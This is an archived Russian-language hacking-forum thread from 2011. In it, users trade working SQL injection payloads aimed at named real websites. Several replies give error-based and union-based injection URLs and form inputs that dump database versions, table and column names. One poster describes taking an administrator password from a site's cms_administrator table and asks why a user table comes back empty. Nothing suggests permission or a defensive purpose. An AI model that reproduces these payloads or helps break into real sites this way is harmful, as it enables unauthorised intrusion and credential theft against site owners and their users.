ANTICHAT — форум по информационной безопасности, OSINT и технологиям
ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию.
Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club,
и теперь снова доступен на новом адресе —
forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
 |
|
14.11.2011, 23:38
|
|
Guest
Сообщений: n/a
Провел на форуме:
149611
Репутация:
81
|
|
Сообщение от s000r
s000r said:
Всем добрый день.
Помогите пожалуйста, вроде бы инъекция есть, а раскрутить не могу...
http://powerdefence.ru/Uslugi_dlya_Yur_lic'
Если у тебя поиске "Результатов не найдено", это тоже скуль? =/
Сообщение от None
Ошибка 404! Данной страницы не существует
Вроде бы ясно сказано.. ещё и крутить собрался.. распечатай, и крути, запустить можешь даже.
|
|
|
|
15.11.2011, 01:10
|
|
Новичок
Регистрация: 21.12.2009
Сообщений: 0
Провел на форуме:
15756
Репутация:
0
|
|
s000r
http://powerdefence.ru/Uslugi_dlya_Yur_lic'or(1,2)=(select*from(select(na me_const(version(),1)),name_const(version(),1))a)a nd'1/
Не слушай никого, крути
Сообщение от Osstudio
Osstudio said:
Код:
Code:
(-1')order(by)10--
Срань какая, прости господи )
Osstudio я бы на твоём месте вообще перестал писать )
|
|
|
15.11.2011, 17:02
|
|
Познающий
Регистрация: 18.11.2009
Сообщений: 30
Провел на форуме:
86200
Репутация:
17
|
|
Сообщение от None
http://apael.com/vote
Не уверен, но вроде инъекция в POST, запросе. Подставьте кавычку, увидите. Но реализовать не получается. Есть ли там вообще уязв?
|
|
|
|
15.11.2011, 17:14
|
|
Guest
Сообщений: n/a
Провел на форуме:
28093
Репутация:
11
|
|
Kerny,
Уязвимость есть! Через Live HTTP Headers...
Сообщение от None
login=&account=&password='or+1=1)+union+select+1,2 +--+
Т.е. в поле Пароль:
Код:
Code:
'or+1=1)+union+select+1,2+--+
Error based, в поле логин:
Код:
Code:
'or+1=1)+and+(select+1+from(select+count(*),concat((select+table_name+from+information_schema.tables+limit+0,1),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)+--+
Получаем:
Код:
Code:
Duplicate entry 'CHARACTER_SETS1' for key 'group_key'
P.S. Не обращай внимания на цифру "1" в конце.
P.S.S. Походу mq = on ...
|
|
|
|
15.11.2011, 20:38
|
|
Познающий
Регистрация: 06.01.2009
Сообщений: 69
Провел на форуме:
116125
Репутация:
3
|
|
http://rusbanket.ru/index.php?ukey=news&blog_id=0%20union%20select%20v ersion%28%29;+--
как такое крутить? как error based - вывел версию, а вывести значение столбца из определенной таблицы не получалось
|
|
|
|
15.11.2011, 20:54
|
|
Guest
Сообщений: n/a
Провел на форуме:
28093
Репутация:
11
|
|
vadd,
Код:
Code:
http://rusbanket.ru/index.php?ukey=news&blog_id=8+and(select+1+from(select+count(*),concat((select+table_name+from+information_schema.tables+limit+1,1),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)--
Код:
Code:
http://rusbanket.ru/index.php?ukey=news&blog_id=8+and(select+1+from(select+count(*),concat((select+column_name+from+information_schema.columns+where+table_name='SC_orders'+limit+0,1),floor(rand(0)*2))x+from+information_schema.columns+group+by+x)a)--
|
|
|
|
16.11.2011, 01:06
|
|
Guest
Сообщений: n/a
Провел на форуме:
97332
Репутация:
38
|
|
Сообщение от KolosJey
KolosJey said:
s000r
http://powerdefence.ru/Uslugi_dlya_Yur_lic'or(1,2)=(select*from(select(na me_const(version(),1)),name_const(version(),1))a)a nd'1/
Не слушай никого, крути
Срань какая, прости господи )
Osstudio
я бы на твоём месте вообще перестал писать )
Ошибка - не есть инъекция.
Логика не отрабатывает.
p.s. Osstudio знает, что говорит.
|
|
|
|
16.11.2011, 02:39
|
|
Guest
Сообщений: n/a
Провел на форуме:
611
Репутация:
0
|
|
Сообщение от Pirotexnik
Pirotexnik said:
Ошибка - не есть инъекция.
Логика не отрабатывает.
p.s. Osstudio знает, что говорит.
Уязвимость есть. Пробуйте в другом браузере, не Firefox, т.к. он кавычку преображает в %27, поэтому уязвимость на данном сайте в Firefox не видна.
Результат вышеуказанного запроса:
Duplicate column name '5.0.51a-3ubuntu5.8-log'
|
|
|
|
16.11.2011, 22:21
|
|
Guest
Сообщений: n/a
Провел на форуме:
7046
Репутация:
1
|
|
Парадокс!
Всем доброго времени суток. Ситуация такова:
Сайт со скулей 5я ветка
index/page/id/1'+or+1+group%20by%20concat((select%20concat(0x3a, password,0x3a)%20from%20cms_administrator%20limit% 201,1),floor(rand(0)*2))%20having%20min(0)%20or%20 1='
Этот запрос дал мне пароль админа из таблицы cms_administrator. Все здорово, отлично. Соответственно пас меняем на логин выдает логин. Все тоже работает на ура. Но есть еще один column - cms_user При таком же запросе к нему меня отбрасывает на 404 ошибку, как будто закончился лимит значений. Хотя значений там хватает. Ни логины не пароли ничего из этого столбца не дает.
+ Парадокс соседом является еще один сайт с немного другим функционалом но суть та-же организация та-же. Из за расстройства использовал Havij дал ему кавычку он схавал, выдал таблицы, столбцы и версия скуля тоже 5я и есть такие же столбцы пытался стянуть через него с админами все равно с цмс юзерами куча пустых строк. Кто еще не устал ответьте в чем может быть подвох? так на вскидку.
|
|
|
|
16.11.2011, 23:06
|
|
Guest
Сообщений: n/a
Провел на форуме:
28093
Репутация:
11
|
|
lion-art,
это значит, что ячейки пустые... Т.е. там нет юзеров..
|
|
|
|
|
|
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
Похожие темы
Линейный вид
